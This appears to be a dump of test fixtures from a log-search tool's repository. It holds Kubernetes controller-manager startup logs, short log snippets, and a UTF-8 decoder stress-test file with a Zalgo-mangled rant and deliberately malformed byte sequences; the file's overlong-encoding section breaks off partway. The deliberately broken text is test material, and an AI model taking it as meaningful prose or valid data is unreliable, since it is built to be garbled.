20:27:23.783254 1 flags.go:59] FLAG: --configure-cloud-routes="true" 48 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783258 1 flags.go:59] FLAG: --contention-profiling="false" 49 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783264 1 flags.go:59] FLAG: --controller-start-interval="0s" 50 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783268 1 flags.go:59] FLAG: --controllers="[*,-csrsigning]" 51 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783278 1 flags.go:59] FLAG: --deleting-pods-burst="0" 52 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783282 1 flags.go:59] FLAG: --deleting-pods-qps="0.1" 53 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783288 1 flags.go:59] FLAG: --deployment-controller-sync-period="30s" 54 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783292 1 flags.go:59] FLAG: --disable-attach-detach-reconcile-sync="false" 55 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783296 1 flags.go:59] FLAG: --enable-dynamic-provisioning="true" 56 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783300 1 flags.go:59] FLAG: --enable-garbage-collector="true" 57 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783304 1 flags.go:59] FLAG: --enable-hostpath-provisioner="false" 58 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783307 1 flags.go:59] FLAG: --enable-taint-manager="true" 59 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783312 1 flags.go:59] FLAG: --endpoint-updates-batch-period="0s" 60 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783315 1 flags.go:59] FLAG: --endpointslice-updates-batch-period="0s" 61 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783319 1 flags.go:59] FLAG: --experimental-cluster-signing-duration="8760h0m0s" 62 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783325 1 flags.go:59] FLAG: --experimental-logging-sanitization="false" 63 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783329 1 flags.go:59] FLAG: --external-cloud-volume-plugin="" 64 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783332 1 flags.go:59] FLAG: --feature-gates="RotateKubeletServerCertificate=true,TTLAfterFinished=true" 65 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783348 1 flags.go:59] FLAG: --flex-volume-plugin-dir="/usr/libexec/kubernetes/kubelet-plugins/volume/exec/" 66 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783354 1 flags.go:59] FLAG: --help="false" 67 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783357 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-cpu-initialization-period="5m0s" 68 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783362 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-downscale-delay="5m0s" 69 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783366 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-downscale-stabilization="5m0s" 70 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783370 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-initial-readiness-delay="30s" 71 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783373 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-sync-period="15s" 72 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783377 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-tolerance="0.1" 73 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783384 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-upscale-delay="3m0s" 74 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783388 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-use-rest-clients="true" 75 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783391 1 flags.go:59] FLAG: --http2-max-streams-per-connection="0" 76 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783400 1 flags.go:59] FLAG: --kube-api-burst="30" 77 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783403 1 flags.go:59] FLAG: --kube-api-content-type="application/vnd.kubernetes.protobuf" 78 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783408 1 flags.go:59] FLAG: --kube-api-qps="20" 79 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783413 1 flags.go:59] FLAG: --kubeconfig="/etc/kubernetes/controller-manager.conf" 80 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783421 1 flags.go:59] FLAG: --large-cluster-size-threshold="50" 81 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783425 1 flags.go:59] FLAG: --leader-elect="true" 82 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783429 1 flags.go:59] FLAG: --leader-elect-lease-duration="15s" 83 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783433 1 flags.go:59] FLAG: --leader-elect-renew-deadline="10s" 84 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783437 1 flags.go:59] FLAG: --leader-elect-resource-lock="leases" 85 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783441 1 flags.go:59] FLAG: --leader-elect-resource-name="kube-controller-manager" 86 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783445 1 flags.go:59] FLAG: --leader-elect-resource-namespace="kube-system" 87 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783449 1 flags.go:59] FLAG: --leader-elect-retry-period="2s" 88 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783456 1 flags.go:59] FLAG: --log-backtrace-at=":0" 89 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783461 1 flags.go:59] FLAG: --log-dir="" 90 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783464 1 flags.go:59] FLAG: --log-file="/var/log/kube-controller-manager.log" 91 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783469 1 flags.go:59] FLAG: --log-file-max-size="1800" 92 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783473 1 flags.go:59] FLAG: --log-flush-frequency="5s" 93 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783477 1 flags.go:59] FLAG: --logging-format="text" 94 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783481 1 flags.go:59] FLAG: --logtostderr="false" 95 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783487 1 flags.go:59] FLAG: --master="" 96 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783490 1 flags.go:59] FLAG: --max-endpoints-per-slice="100" 97 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783494 1 flags.go:59] FLAG: --min-resync-period="12h0m0s" 98 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783498 1 flags.go:59] FLAG: --mirroring-concurrent-service-endpoint-syncs="5" 99 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783502 1 flags.go:59] FLAG: --mirroring-endpointslice-updates-batch-period="0s" 100 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783507 1 flags.go:59] FLAG: --mirroring-max-endpoints-per-subset="1000" 101 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783511 1 flags.go:59] FLAG: --namespace-sync-period="5m0s" 102 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783515 1 flags.go:59] FLAG: --node-cidr-mask-size="0" 103 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783518 1 flags.go:59] FLAG: --node-cidr-mask-size-ipv4="0" 104 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783522 1 flags.go:59] FLAG: --node-cidr-mask-size-ipv6="0" 105 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783525 1 flags.go:59] FLAG: --node-eviction-rate="0.1" 106 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783530 1 flags.go:59] FLAG: --node-monitor-grace-period="40s" 107 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783534 1 flags.go:59] FLAG: --node-monitor-period="5s" 108 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783538 1 flags.go:59] FLAG: --node-startup-grace-period="1m0s" 109 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783541 1 flags.go:59] FLAG: --node-sync-period="0s" 110 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783545 1 flags.go:59] FLAG: --one-output="false" 111 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783549 1 flags.go:59] FLAG: --permit-port-sharing="false" 112 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783553 1 flags.go:59] FLAG: --pod-eviction-timeout="5m0s" 113 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783557 1 flags.go:59] FLAG: --port="10252" 114 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783561 1 flags.go:59] FLAG: --profiling="true" 115 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783565 1 flags.go:59] FLAG: --pv-recycler-increment-timeout-nfs="30" 116 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783568 1 flags.go:59] FLAG: --pv-recycler-minimum-timeout-hostpath="60" 117 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783572 1 flags.go:59] FLAG: --pv-recycler-minimum-timeout-nfs="300" 118 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783576 1 flags.go:59] FLAG: --pv-recycler-pod-template-filepath-hostpath="" 119 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783583 1 flags.go:59] FLAG: --pv-recycler-pod-template-filepath-nfs="" 120 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783587 1 flags.go:59] FLAG: --pv-recycler-timeout-increment-hostpath="30" 121 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783590 1 flags.go:59] FLAG: --pvclaimbinder-sync-period="15s" 122 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783594 1 flags.go:59] FLAG: --register-retry-count="10" 123 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783598 1 flags.go:59] FLAG: --requestheader-allowed-names="[]" 124 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783605 1 flags.go:59] FLAG: --requestheader-client-ca-file="" 125 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783609 1 flags.go:59] FLAG: --requestheader-extra-headers-prefix="[x-remote-extra-]" 126 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783616 1 flags.go:59] FLAG: --requestheader-group-headers="[x-remote-group]" 127 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783624 1 flags.go:59] FLAG: --requestheader-username-headers="[x-remote-user]" 128 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783631 1 flags.go:59] FLAG: --resource-quota-sync-period="5m0s" 129 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783635 1 flags.go:59] FLAG: --root-ca-file="/etc/kubernetes/pki/ca.crt" 130 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783639 1 flags.go:59] FLAG: --route-reconciliation-period="10s" 131 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783643 1 flags.go:59] FLAG: --secondary-node-eviction-rate="0.01" 132 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783648 1 flags.go:59] FLAG: --secure-port="10257" 133 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783652 1 flags.go:59] FLAG: --service-account-private-key-file="/etc/kubernetes/pki/sa.key" 134 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783656 1 flags.go:59] FLAG: --service-cluster-ip-range="10.100.0.0/16" 135 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783660 1 flags.go:59] FLAG: --show-hidden-metrics-for-version="" 136 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783663 1 flags.go:59] FLAG: --skip-headers="false" 137 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783667 1 flags.go:59] FLAG: --skip-log-headers="false" 138 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783671 1 flags.go:59] FLAG: --stderrthreshold="4" 139 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783676 1 flags.go:59] FLAG: --terminated-pod-gc-threshold="12500" 140 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783681 1 flags.go:59] FLAG: --tls-cert-file="" 141 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783684 1 flags.go:59] FLAG: --tls-cipher-suites="[]" 142 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783691 1 flags.go:59] FLAG: --tls-min-version="" 143 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783695 1 flags.go:59] FLAG: --tls-private-key-file="" 144 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783702 1 flags.go:59] FLAG: --tls-sni-cert-key="[]" 145 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783709 1 flags.go:59] FLAG: --unhealthy-zone-threshold="0.55" 146 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783714 1 flags.go:59] FLAG: --use-service-account-credentials="true" 147 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783718 1 flags.go:59] FLAG: --v="2" 148 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783721 1 flags.go:59] FLAG: --version="false" 149 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783729 1 flags.go:59] FLAG: --vmodule="" 150 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783732 1 flags.go:59] FLAG: --volume-host-allow-local-loopback="true" 151 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783736 1 flags.go:59] FLAG: --volume-host-cidr-denylist="[10.0.0.0/16]" 152 | 2021-07-10T20:27:24.000Z I0710 20:27:24.780473 1 serving.go:331] Generated self-signed cert in-memory 153 | 2021-07-10T20:27:25.000Z W0710 20:27:25.671683 1 authentication.go:307] No authentication-kubeconfig provided in order to lookup client-ca-file in configmap/extension-apiserver-authentication in kube-system, so client certificate authentication won't work. 154 | 2021-07-10T20:27:25.000Z W0710 20:27:25.671697 1 authentication.go:331] No authentication-kubeconfig provided in order to lookup requestheader-client-ca-file in configmap/extension-apiserver-authentication in kube-system, so request-header client certificate authentication won't work. 155 | 2021-07-10T20:27:25.000Z W0710 20:27:25.671712 1 authorization.go:176] No authorization-kubeconfig provided, so SubjectAccessReview of authorization tokens won't work. 156 | 2021-07-10T20:27:25.000Z I0710 20:27:25.671736 1 controllermanager.go:176] Version: v1.20.4-eks-6b7464 157 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673359 1 tlsconfig.go:200] loaded serving cert ["Generated self signed cert"]: "localhost@1625948844" [serving] validServingFor=[127.0.0.1,localhost,localhost] issuer="localhost-ca@1625948844" (2021-07-10 19:27:23 +0000 UTC to 2022-07-10 19:27:23 +0000 UTC (now=2021-07-10 20:27:25.673332535 +0000 UTC)) 158 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673666 1 named_certificates.go:53] loaded SNI cert [0/"self-signed loopback"]: "apiserver-loopback-client@1625948845" [serving] validServingFor=[apiserver-loopback-client] issuer="apiserver-loopback-client-ca@1625948845" (2021-07-10 19:27:24 +0000 UTC to 2022-07-10 19:27:24 +0000 UTC (now=2021-07-10 20:27:25.673650999 +0000 UTC)) 159 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673707 1 secure_serving.go:197] Serving securely on [::]:10257 160 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673734 1 tlsconfig.go:240] Starting DynamicServingCertificateController 161 | 2021-07-10T20:27:25.000Z I0710 20:27:25.674696 1 deprecated_insecure_serving.go:53] Serving insecurely on 127.0.0.1:10252 162 | 2021-07-10T20:28:31.031Z Log file created at: 2021/07/10 20:27:23 163 | Running on machine: ip-10-0-55-213 164 | Binary: Built with gc go1.15.8 for linux/amd64 165 | Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg 166 | 2021-07-10T20:27:25.000Z I0710 20:27:25.674750 1 leaderelection.go:243] attempting to acquire leader lease kube-system/kube-controller-manager... 167 | -------------------------------------------------------------------------------- /tests/data/000000.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/tests/data/000000.gz -------------------------------------------------------------------------------- /tests/data/000000.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/tests/data/000000.zip -------------------------------------------------------------------------------- /tests/data/14_3.log: -------------------------------------------------------------------------------- 1 | 2021-08-24T12:16:09.940Z","caller":"awsutils/awsutils.go:583","msg":"Using device number 0 for primary ENI: eni-0114718a8456d2591"} 2 | {"level":"debug","ts":" 3 | SomeLine -------------------------------------------------------------------------------- /tests/data/26688_17.log: -------------------------------------------------------------------------------- 1 | 2021-08-24T14-32-58.244Z complete response 2 | -------------------------------------------------------------------------------- /tests/data/35010_7.log: -------------------------------------------------------------------------------- 1 | 2021-02-05] bpf: Fix verifier jsgt branch analysis on max bound (daniel@iogearbox.net) 2 | + [9e6de38] [SomeLine -------------------------------------------------------------------------------- /tests/data/UTF-8-Test.txt: -------------------------------------------------------------------------------- 1 | 2021-07-07T16:46:30.000Z UTF-8 decoder capability and stress test INFO Starting up agent subsystem INFO [ssm-session-worker]User name,AWS access key,Event time"serviceName": "guardduty""schemaVersion" 2 | ---------------------------------------- 3 | 4 | 5 | You can't parse [X]HTML with regex. Because HTML can't be parsed by regex. Regex is not a tool that can be used to correctly parse HTML. As I have answered in HTML-and-regex questions here so many times before, the use of regex will not allow you to consume HTML. Regular expressions are a tool that is insufficiently sophisticated to understand the constructs employed by HTML. HTML is not a regular language and hence cannot be parsed by regular expressions. Regex queries are not equipped to break down HTML into its meaningful parts. so many times but it is not getting to me. Even enhanced irregular regular expressions as used by Perl are not up to the task of parsing HTML. You will never make me crack. HTML is a language of sufficient complexity that it cannot be parsed by regular expressions. Even Jon Skeet cannot parse HTML using regular expressions. Every time you attempt to parse HTML with regular expressions, the unholy child weeps the blood of virgins, and Russian hackers pwn your webapp. Parsing HTML with regex summons tainted souls into the realm of the living. HTML and regex go together like love, marriage, and ritual infanticide. The
cannot hold it is too late. The force of regex and HTML together in the same conceptual space will destroy your mind like so much watery putty. If you parse HTML with regex you are giving in to Them and their blasphemous ways which doom us all to inhuman toil for the One whose Name cannot be expressed in the Basic Multilingual Plane, he comes. HTML-plus-regexp will liquify the n​erves of the sentient whilst you observe, your psyche withering in the onslaught of horror. Rege̿̔̉x-based HTML parsers are the cancer that is killing StackOverflow it is too late it is too late we cannot be saved the transgression of a chi͡ld ensures regex will consume all living tissue (except for HTML which it cannot, as previously prophesied) dear lord help us how can anyone survive this scourge using regex to parse HTML has doomed humanity to an eternity of dread torture and security holes using regex as a tool to process HTML establishes a breach between this world and the dread realm of c͒ͪo͛ͫrrupt entities (like SGML entities, but more corrupt) a mere glimpse of the world of reg​ex parsers for HTML will ins​tantly transport a programmer's consciousness into a world of ceaseless screaming, he comes, the pestilent slithy regex-infection wil​l devour your HT​ML parser, application and existence for all time like Visual Basic only worse he comes he comes do not fi​ght he com̡e̶s, ̕h̵i​s un̨ho͞ly radiańcé destro҉ying all enli̍̈́̂̈́ghtenment, HTML tags lea͠ki̧n͘g fr̶ǫm ̡yo​͟ur eye͢s̸ ̛l̕ik͏e liq​uid pain, the song of re̸gular exp​ression parsing will exti​nguish the voices of mor​tal man from the sp​here I can see it can you see ̲͚̖͔̙î̩́t̲͎̩̱͔́̋̀ it is beautiful t​he final snuffing of the lie​s of Man ALL IS LOŚ͖̩͇̗̪̏̈́T ALL I​S LOST the pon̷y he comes he c̶̮omes he comes the ich​or permeates all MY FACE MY FACE ᵒh god no NO NOO̼O​O NΘ stop the an​*̶͑̾̾​̅ͫ͏̙̤g͇̫͛͆̾ͫ̑͆l͖͉̗̩̳̟̍ͫͥͨe̠̅s ͎a̧͈͖r̽̾̈́͒͑e n​ot rè̑ͧ̌aͨl̘̝̙̃ͤ͂̾̆ ZA̡͊͠͝LGΌ ISͮ̂҉̯͈͕̹̘̱ TO͇̹̺ͅƝ̴ȳ̳ TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ 6 | Markus Kuhn - 2015-08-28 - CC BY 4.0 7 | 8 | This test file can help you examine, how your UTF-8 decoder handles 9 | various types of correct, malformed, or otherwise interesting UTF-8 10 | sequences. This file is not meant to be a conformance test. It does 11 | not prescribe any particular outcome. Therefore, there is no way to 12 | "pass" or "fail" this test file, even though the text does suggest a 13 | preferable decoder behaviour at some places. Its aim is, instead, to 14 | help you think about, and test, the behaviour of your UTF-8 decoder on a 15 | systematic collection of unusual inputs. Experience so far suggests 16 | that most first-time authors of UTF-8 decoders find at least one 17 | serious problem in their decoder using this file. 18 | 19 | The test lines below cover boundary conditions, malformed UTF-8 20 | sequences, as well as correctly encoded UTF-8 sequences of Unicode code 21 | points that should never occur in a correct UTF-8 file. 22 | 23 | According to ISO 10646-1:2000, sections D.7 and 2.3c, a device 24 | receiving UTF-8 shall interpret a "malformed sequence in the same way 25 | that it interprets a character that is outside the adopted subset" and 26 | "characters that are not within the adopted subset shall be indicated 27 | to the user" by a receiving device. One commonly used approach in 28 | UTF-8 decoders is to replace any malformed UTF-8 sequence by a 29 | replacement character (U+FFFD), which looks a bit like an inverted 30 | question mark, or a similar symbol. It might be a good idea to 31 | visually distinguish a malformed UTF-8 sequence from a correctly 32 | encoded Unicode character that is just not available in the current 33 | font but otherwise fully legal, even though ISO 10646-1 doesn't 34 | mandate this. In any case, just ignoring malformed sequences or 35 | unavailable characters does not conform to ISO 10646, will make 36 | debugging more difficult, and can lead to user confusion. 37 | 38 | Please check, whether a malformed UTF-8 sequence is (1) represented at 39 | all, (2) represented by exactly one single replacement character (or 40 | equivalent signal), and (3) the following quotation mark after an 41 | illegal UTF-8 sequence is correctly displayed, i.e. proper 42 | resynchronization takes place immediately after any malformed 43 | sequence. This file says "THE END" in the last line, so if you don't 44 | see that, your decoder crashed somehow before, which should always be 45 | cause for concern. 46 | 47 | All lines in this file are exactly 79 characters long (plus the line 48 | feed). In addition, all lines end with "|", except for the two test 49 | lines 2.1.1 and 2.2.1, which contain non-printable ASCII controls 50 | U+0000 and U+007F. If you display this file with a fixed-width font, 51 | these "|" characters should all line up in column 79 (right margin). 52 | This allows you to test quickly, whether your UTF-8 decoder finds the 53 | correct number of characters in every line, that is whether each 54 | malformed sequences is replaced by a single replacement character. 55 | 56 | Note that, as an alternative to the notion of malformed sequence used 57 | here, it is also a perfectly acceptable (and in some situations even 58 | preferable) solution to represent each individual byte of a malformed 59 | sequence with a replacement character. If you follow this strategy in 60 | your decoder, then please ignore the "|" column. 61 | 62 | 63 | Here come the tests: | 64 | | 65 | 1 Some correct UTF-8 text | 66 | | 67 | You should see the Greek word 'kosme': "κόσμε" | 68 | | 69 | 2 Boundary condition test cases | 70 | | 71 | 2.1 First possible sequence of a certain length | 72 | | 73 | 2.1.1 1 byte (U-00000000): "" 74 | 2.1.2 2 bytes (U-00000080): "€" | 75 | 2.1.3 3 bytes (U-00000800): "ࠀ" | 76 | 2.1.4 4 bytes (U-00010000): "𐀀" | 77 | 2.1.5 5 bytes (U-00200000): "�����" | 78 | 2.1.6 6 bytes (U-04000000): "������" | 79 | | 80 | 2.2 Last possible sequence of a certain length | 81 | | 82 | 2.2.1 1 byte (U-0000007F): "" 83 | 2.2.2 2 bytes (U-000007FF): "߿" | 84 | 2.2.3 3 bytes (U-0000FFFF): "￿" | 85 | 2.2.4 4 bytes (U-001FFFFF): "����" | 86 | 2.2.5 5 bytes (U-03FFFFFF): "�����" | 87 | 2021-07-07T16:46:30.000Z 2.2.6 6 bytes (U-7FFFFFFF): "������" | 88 | | 89 | 2.3 Other boundary conditions | 90 | | 91 | 2.3.1 U-0000D7FF = ed 9f bf = "퟿" | 92 | 2.3.2 U-0000E000 = ee 80 80 = "" | 93 | 2.3.3 U-0000FFFD = ef bf bd = "�" | 94 | 2.3.4 U-0010FFFF = f4 8f bf bf = "􏿿" | 95 | 2.3.5 U-00110000 = f4 90 80 80 = "����" | 96 | | 97 | 3 Malformed sequences | 98 | | 99 | 3.1 Unexpected continuation bytes | 100 | | 101 | Each unexpected continuation byte should be separately signalled as a | 102 | malformed sequence of its own. | 103 | | 104 | 3.1.1 First continuation byte 0x80: "�" | 105 | 3.1.2 Last continuation byte 0xbf: "�" | 106 | | 107 | 3.1.3 2 continuation bytes: "��" | 108 | 3.1.4 3 continuation bytes: "���" | 109 | 3.1.5 4 continuation bytes: "����" | 110 | 3.1.6 5 continuation bytes: "�����" | 111 | 3.1.7 6 continuation bytes: "������" | 112 | 3.1.8 7 continuation bytes: "�������" | 113 | | 114 | 3.1.9 Sequence of all 64 possible continuation bytes (0x80-0xbf): | 115 | | 116 | "���������������� | 117 | ���������������� | 118 | ���������������� | 119 | ����������������" | 120 | | 121 | 3.2 Lonely start characters | 122 | | 123 | 3.2.1 All 32 first bytes of 2-byte sequences (0xc0-0xdf), | 124 | each followed by a space character: | 125 | | 126 | "� � � � � � � � � � � � � � � � | 127 | � � � � � � � � � � � � � � � � " | 128 | | 129 | 3.2.2 All 16 first bytes of 3-byte sequences (0xe0-0xef), | 130 | each followed by a space character: | 131 | | 132 | "� � � � � � � � � � � � � � � � " | 133 | | 134 | 3.2.3 All 8 first bytes of 4-byte sequences (0xf0-0xf7), | 135 | each followed by a space character: | 136 | | 137 | "� � � � � � � � " | 138 | | 139 | 3.2.4 All 4 first bytes of 5-byte sequences (0xf8-0xfb), | 140 | each followed by a space character: | 141 | | 142 | "� � � � " | 143 | | 144 | 3.2.5 All 2 first bytes of 6-byte sequences (0xfc-0xfd), | 145 | each followed by a space character: | 146 | | 147 | "� � " | 148 | | 149 | 3.3 Sequences with last continuation byte missing | 150 | | 151 | All bytes of an incomplete sequence should be signalled as a single | 152 | malformed sequence, i.e., you should see only a single replacement | 153 | character in each of the next 10 tests. (Characters as in section 2) | 154 | | 155 | 3.3.1 2-byte sequence with last byte missing (U+0000): "�" | 156 | 3.3.2 3-byte sequence with last byte missing (U+0000): "��" | 157 | 3.3.3 4-byte sequence with last byte missing (U+0000): "���" | 158 | 3.3.4 5-byte sequence with last byte missing (U+0000): "����" | 159 | 3.3.5 6-byte sequence with last byte missing (U+0000): "�����" | 160 | 3.3.6 2-byte sequence with last byte missing (U-000007FF): "�" | 161 | 3.3.7 3-byte sequence with last byte missing (U-0000FFFF): "�" | 162 | 3.3.8 4-byte sequence with last byte missing (U-001FFFFF): "���" | 163 | 3.3.9 5-byte sequence with last byte missing (U-03FFFFFF): "����" | 164 | 3.3.10 6-byte sequence with last byte missing (U-7FFFFFFF): "�����" | 165 | | 166 | 3.4 Concatenation of incomplete sequences | 167 | | 168 | All the 10 sequences of 3.3 concatenated, you should see 10 malformed | 169 | sequences being signalled: | 170 | | 171 | "�����������������������������" | 172 | | 173 | 3.5 Impossible bytes | 174 | | 175 | The following two bytes cannot appear in a correct UTF-8 string | 176 | | 177 | 3.5.1 fe = "�" | 178 | 3.5.2 ff = "�" | 179 | 3.5.3 fe fe ff ff = "����" | 180 | | 181 | 4 Overlong sequences | 182 | | 183 | The following sequences are not malformed according to the letter of | 184 | the Unicode 2.0 standard. However, they are longer then necessary and | 185 | a correct UTF-8 encoder is not allowed to produce them. A "safe UTF-8 | 186 | decoder" should reject them just like malformed sequences for two | 187 | reasons: (1) It helps to debug applications if overlong sequences are | 188 | not treated as valid representations of characters, because this helps | 189 | to spot problems more quickly. (2) Overlong sequences provide | 190 | alternative representations of characters, that could maliciously be | 191 | used to bypass filters that check only for ASCII characters. For | 192 | instance, a 2-byte encoded line feed (LF) would not be caught by a | 193 | line counter that counts only 0x0a bytes, but it would still be | 194 | processed as a line feed by an unsafe UTF-8 decoder later in the | 195 | pipeline. From a security point of view, ASCII compatibility of UTF-8 | 196 | sequences means also, that ASCII characters are *only* allowed to be | 197 | represented by ASCII bytes in the range 0x00-0x7f. To ensure this | 198 | aspect of ASCII compatibility, use only "safe UTF-8 decoders" that | 199 | reject overlong UTF-8 sequences for which a shorter encoding exists. | 200 | | 201 | 4.1 Examples of an overlong ASCII character | 202 | | 203 | With a safe UTF-8 decoder, all of the following five overlong | 204 | representations of the ASCII character slash ("/") should be rejected | 205 | like a malformed UTF-8 sequence, for instance by substituting it with | 206 | a replacement character. If you see a slash below, you do not have a | 207 | safe UTF-8 decoder! | 208 | | 209 | 4.1.1 U+002F = c0 af = "��" | 210 | 4.1.2 U+002F = e0 80 af = "���" | 211 | 4.1.3 U+002F = f0 80 80 af = "����" | 212 | 4.1.4 U+002F = f8 80 80 80 af = "�����" | 213 | 4.1.5 U+002F = fc 80 80 80 80 af = "������" | 214 | | 215 | 4.2 Maximum overlong sequences | 216 | | 217 | Below you see the highest Unicode value that is still resulting in an | 218 | overlong sequence if represented with the given number of bytes. This | 219 | is a boundary test for safe UTF-8 decoders. All five characters should | 220 | be rejected like malformed UTF-8 sequences. | 221 | | 222 | 4.2.1 U-0000007F = c1 bf = "��" | 223 | 4.2.2 U-000007FF = e0 9f bf = "���" | 224 | 4.2.3 U-0000FFFF = f0 8f bf bf = "����" | 225 | 4.2.4 U-001FFFFF = f8 87 bf bf bf = "�����" | 226 | 4.2.5 U-03FFFFFF = fc 83 bf bf bf bf = "������" | 227 | | 228 | 4.3 Overlong representation of the NUL character | 229 | | 230 | The following five sequences should also be rejected like malformed | 231 | UTF-8 sequences and should not be treated like the ASCII NUL | 232 | character. | 233 | | 234 | 4.3.1 U+0000 = c0 80 = "��" | 235 | 4.3.2 